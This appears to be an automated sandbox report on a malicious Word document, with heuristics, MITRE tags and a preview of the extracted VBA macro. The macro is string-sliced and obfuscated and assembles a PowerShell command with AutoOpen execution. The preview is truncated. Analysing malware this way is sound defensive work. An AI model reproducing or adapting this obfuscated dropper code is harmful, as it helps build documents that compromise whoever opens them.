MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. A critical heuristic firing indicates the presence of a Shell() call within the VBA code. The extracted VBA script attempts to construct and execute a PowerShell command, likely to download and run a second-stage payload. The AutoOpen macro marker further suggests automatic execution upon opening.
Heuristics 5
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 151287 bytes |
SHA-256: fc092062c2a1524ac1832f507418614c353cc1ac567b58cf9b1d976ff6e69004 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "nkmURXXZ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function CnpSzAKtzW()
On Error Resume Next
wiXmQIXtTwG = (RGjPIvjwNM - CLng(271724) + RfjCZD + Fix(ALwaJt / CDbl(495505 * Sqr(GzQHCYpQjqf))) - 583503 / Sin(jjOwEi - PGHkFzqIw + rqwmVCwSrKo - 928918 + CDbl(rqwmVCwSrKo)) * 847456 * Fix(271724))
XVoriIK = "p8r*'fFO5Bx1HNeT6P35Yi8Lo3CJDCANrBbZPrNQyFex7ZXREqoJyYP6zs8TSvAowershell & ((GEt-varIabLe '*uMd4lwXQRg)nZHL"
crJwwHbFj = Left(Right(XVoriIK, 45), 30) + Left(Right(XVoriIK, 14), 2) + Left(Right(XVoriIK, 106), 3) + CStr(Left(Right(XVoriIK, 5), 1))
jQXzS = "M8P'TASJ5KStK9BEjWB2rWm.NaME[3,11,2]-joIN'')((('SABzBMBpLRHBcabTmHU8Qm2k682a((mumIPXPYz"
jiiMul = Left(Right(jQXzS, 64), 25) + Left(Right(jQXzS, 11), 3) + CStr(Left(Right(jQXzS, 84), 1))
WTvdJLrZ = Chr(43)
cBEBwQqUvw = "VMP2M8PB'klHWJnsa9BEjWB2rWmxtH"
mPjwOTZ = CStr(Left(Right(cBEBwQqUvw, 22), 9)) + CStr(Left(Right(cBEBwQqUvw, 4), 1))
QHCniXMZls = "dklVMP"
wwsVhkuu = Left(Right(QHCniXMZls, 5), 2)
FzcZYBGlS = Chr(43)
VIbQhZsXXk = "VMP2MmkldmkJ5KStK9lEj"
aDTfRZ = CStr(Left(Right(VIbQhZsXXk, 16), 6)) + Left(Right(VIbQhZsXXk, 3), 1)
wqNOcLvLwXf = (avBOjXA - CLng(433273) + lYTKD + Fix(hdYaUu / CDbl(681836 * Sqr(YcpHwtXD))) - 985192 / Sin(FiihS - oURLXA + YXCLO - 261128 + CDbl(YXCLO)) * 88784 * Fix(433273))
sPOXFmvKoT = Chr(43)
IqUGfUvkC = "VMP2M8PmklasdmktK9BEjWB2lWm"
uJAHdiA = CStr(Left(Right(IqUGfUvkC, 20), 8)) + CStr(Left(Right(IqUGfUvkC, 3), 1))
PvodzhnYQq = Chr(43)
vhdsZGbCj = "VMP2M8Pmkl = mktK9BEjWB2lWm"
fOzfmMUnXw = CStr(Left(Right(vhdsZGbCj, 20), 8)) + CStr(Left(Right(vhdsZGbCj, 3), 1))
UQBLCwm = Chr(43)
jqpamW = "VMP2M8PBTASJmkl&(ys8nys8mWmxtHYsibYBPBjklyQ30"
nPlfWvD = Left(Right(jqpamW, 33), 13) + CStr(Left(Right(jqpamW, 6), 2))
RqSOfUBoHw = Chr(43)
PfhXioDFu = "dPmklP2M8"
OvIqctAbY = Left(Right(PfhXioDFu, 7), 3)
ONEFUYUiYIl = (TiKjLidf - CLng(771622) + ivYWtiV + Fix(tXLQb / CDbl(713982 * Sqr(OhYTMf))) - 8970 / Sin(wkzEQFPX - aEEhkSfjbu + ZfkZGsUwwmL - 50396 + CDbl(ZfkZGsUwwmL)) * 446366 * Fix(771622))
zUiImhTPf = Chr(43)
WowZjjEjSQw = "VMP2ys8mkASJ5KSlK9"
wYzPiZiHHN = Left(Right(WowZjjEjSQw, 14), 5) + Left(Right(WowZjjEjSQw, 3), 1)
SFbaVkECW = Chr(43)
kvKdRFhZiT = "dPmk'P2M8"
DhPjmwHSQVb = Left(Right(kvKdRFhZiT, 7), 3)
WDBbnDOpqpD = Chr(43)
NJzEW = "VMP2'leysASJ5KS8K9"
fPGhQzPMIrs = Left(Right(NJzEW, 14), 5) + Left(Right(NJzEW, 3), 1)
jjsaXorrGY = Chr(43)
kiKKrGK = (SBwLoGjiJW - CLng(895373) + OYbji + Fix(OdVizn / CDbl(936583 * Sqr(lroENNCp))) - 19390 / Sin(APGQRfwqJP - SrrJujzdd + EUOaazSbVv - 773393 + CDbl(EUOaazSbVv)) * 642479 * Fix(895373))
kmXZhQJqi = "dy'VMP"
inipAOTQ = Left(Right(kmXZhQJqi, 5), 2)
VAVkYzFVkY = Chr(43)
STzqnjiZoo = "VMP2's8mkASJ5KSlK9"
YDbSfZdr = Left(Right(STzqnjiZoo, 14), 5) + Left(Right(STzqnjiZoo, 3), 1)
dhWJz = Chr(43)
sVqXSaFc = "VMP2M8Pmklw-omktK9BEjWB2lWm"
kbaFKHzcM = CStr(Left(Right(sVqXSaFc, 20), 8)) + CStr(Left(Right(sVqXSaFc, 3), 1))
pXcFnucw = Chr(43)
OzEMVcM = "VMP2MmklbmkJ5KStK9lEj"
AaLMKb = CStr(Left(Right(OzEMVcM, 16), 6)) + Left(Right(OzEMVcM, 3), 1)
bLIndMkrM = Chr(43)
CnpSzAKtzW = crJwwHbFj + jiiMul + WTvdJLrZ + mPjwOTZ + wwsVhkuu + FzcZYBGlS + aDTfRZ + sPOXFmvKoT + uJAHdiA + PvodzhnYQq + fOzfmMUnXw + UQBLCwm + nPlfWvD + RqSOfUBoHw + OvIqctAbY + zUiImhTPf + wYzPiZiHHN + SFbaVkECW + DhPjmwHSQVb + WDBbnDOpqpD + fPGhQzPMIrs + jjsaXorrGY + inipAOTQ + VAVkYzFVkY + YDbSfZdr + dhWJz + kbaFKHzcM + pXcFnucw + AaLMKb + bLIndMkrM
End Function
Function uiNRYaOop()
On Error Resume Next
mltJzziu = (AwXUZjqu - CLng(671998) + iDOllnPi + Fix(olkGp / CDbl(105301 * Sqr(MQPsHiIsDX))) - 511850 / Sin(cqwEp - uuqwOAzFtV + uIrtGiHJUzm - 956155 + CDbl(uIrtGiHJUzm)) * 988142 * Fix(671998))
zjsBnE = "VMP2M8PBmkljecymk9BEjWB2rWlxtH"
jZwOz = CStr(Left(Right(zjsBnE, 22), 9)) + CStr(Left(Right(zjsBnE, 4), 1))
XzjijG = Chr(43)
QawM
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.